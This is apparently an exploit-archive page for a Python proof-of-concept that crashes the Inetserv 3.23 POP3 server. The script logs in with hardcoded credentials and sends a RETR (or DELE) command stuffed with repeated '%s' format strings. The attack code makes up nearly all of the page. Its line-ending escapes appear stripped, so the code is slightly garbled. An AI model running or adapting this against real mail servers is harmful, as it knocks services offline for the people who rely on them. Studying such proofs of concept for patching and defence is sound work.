Inetserv 3.23 POP3 Denial of Service

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Inetserv 3.23 POP3 Denial of Service
# Published : 2011-01-24
# Author : dmnt
# Previous Title : Google Chrome v8.0.552.237 address overflow DoS
# Next Title : Maxthon Browser v3.0.20.1000 .ref .replace DOS

#!/usr/bin/python
# Exploit Title: Inetserv 3.23 POP3 DoS
# Date: 1/24/2011
# Author: dmnt (thx G13 for base)
# Software Link: http://www.avtronics.net/inetserv.php
# Version: 3.23
# DoS in RETR and DELE

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = "RETR " + "%s" * 40 + "rn" # or DELE

s.connect(('127.0.0.1',110))

data=s.recv(1024)
s.send("USER adminrn")
data=s.recv(1024)
s.send("PASS 123456rn")
data=s.recv(1024)
s.send(buffer)

s.close()